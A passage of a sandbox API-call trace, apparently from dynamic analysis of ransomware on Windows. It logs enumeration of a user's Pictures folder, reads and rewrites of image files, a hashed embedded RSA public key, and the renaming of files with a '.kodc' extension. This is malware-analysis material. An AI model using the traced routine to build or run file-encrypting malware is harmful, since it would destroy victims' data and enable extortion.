HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae50 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae50 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae50 | out: hHeap=0x630000) returned 1 [0099.335] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.335] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.336] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae80 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae68 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae38 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae20 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9de28 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.336] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.337] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0xd83c, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xd83c, lpOverlapped=0x0) returned 1 [0099.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.337] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd841, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.337] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0099.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.337] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.337] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.337] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.337] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.338] CloseHandle (hObject=0x5cc) returned 1 [0099.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.339] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.339] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.339] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\811SACyKM33.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\811sacykm33.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\811SACyKM33.gif.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\811sacykm33.gif.kodc")) returned 1 [0099.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.340] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.340] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.341] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc895e70, ftCreationTime.dwHighDateTime=0x1d5c202, ftLastAccessTime.dwLowDateTime=0x6937af20, ftLastAccessTime.dwHighDateTime=0x1d5c2af, ftLastWriteTime.dwLowDateTime=0x6937af20, ftLastWriteTime.dwHighDateTime=0x1d5c2af, nFileSizeHigh=0x0, nFileSizeLow=0x18c9f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9q1Th.jpg", cAlternateFileName="")) returned 1 [0099.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.341] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.341] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9q1Th.jpg") returned=".jpg" [0099.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9q1Th.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9q1th.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.342] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=101535) returned 1 [0099.342] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.345] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18c79, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.345] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.345] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.345] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.345] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.346] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x18c9f, lpOverlapped=0x0) returned 1 [0099.346] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.346] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.346] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.346] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.346] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.347] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.347] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.347] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.347] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.347] GetLastError () returned 0x0 [0099.348] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.348] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.348] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.348] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.348] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18ca0) returned 0x9ba6d90 [0099.349] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9de28 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae20 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9b968 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae38 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae68 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae80 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.349] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae68 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae80 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ae80 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ae68 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae80 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae68 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.350] GetCurrentThreadId () returned 0x42c [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5198 [0099.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.351] GetCurrentThreadId () returned 0x42c [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae68 [0099.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae80 [0099.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.352] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18c9f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.352] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.353] 